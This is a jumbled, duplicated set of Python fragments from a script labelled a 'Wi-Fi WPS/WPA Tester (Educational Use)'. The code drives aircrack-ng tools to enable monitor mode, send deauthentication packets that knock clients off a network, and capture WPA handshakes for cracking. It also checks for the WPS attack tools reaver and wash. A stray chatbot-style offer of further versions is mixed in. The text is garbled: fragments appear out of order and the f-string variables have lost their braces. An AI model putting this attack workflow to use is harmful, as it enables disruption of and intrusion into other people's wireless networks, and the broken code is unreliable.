print(GREEN + f"Found wireless interface: iface" + RESET) mon_iface = enable_monitor_mode(iface) print(GREEN + f"Monitor mode enabled: mon_iface" + RESET)
Would you like a version for (using root + bcmon) or a Windows-only passive scanner next? WIFI WPS WPA TESTER for PC
def check_dependencies(): """Check if required tools are installed""" tools = ["airmon-ng", "airodump-ng", "reaver", "wash", "aireplay-ng"] missing = [] for tool in tools: if subprocess.run(f"which tool", shell=True, capture_output=True).returncode != 0: missing.append(tool) if missing: print(RED + f"Missing tools: ', '.join(missing)" + RESET) print(YELLOW + "Install with: sudo apt install aircrack-ng reaver" + RESET) return False return True print(GREEN + f"Found wireless interface: iface" + RESET)
# Check if handshake was captured check_cmd = f"sudo aircrack-ng output_file-01.cap 2>/dev/null | grep -q '1 handshake'" if subprocess.run(check_cmd, shell=True).returncode == 0: print(GREEN + f"Handshake captured! File: output_file-01.cap" + RESET) return f"output_file-01.cap" else: print(RED + "No handshake captured. Try again with a client connected." + RESET) return None def main(): print(GREEN + "=== Wi-Fi WPS/WPA Tester for PC (Educational Use) ===" + RESET) Try again with a client connected
# Start airodump to capture handshake dump_cmd = f"sudo airodump-ng -c channel --bssid bssid -w output_file mon_interface" proc = subprocess.Popen(dump_cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) time.sleep(5)
def enable_monitor_mode(interface): """Enable monitor mode on interface""" print(YELLOW + f"Enabling monitor mode on interface..." + RESET) run_command(f"sudo airmon-ng check kill") run_command(f"sudo airmon-ng start interface") # monitor mode interface is usually $interfacemon return f"interfacemon"
# Deauth attack to force reconnection print(YELLOW + "Sending deauthentication packets to force handshake..." + RESET) deauth_cmd = f"sudo aireplay-ng -0 5 -a bssid mon_interface" run_command(deauth_cmd)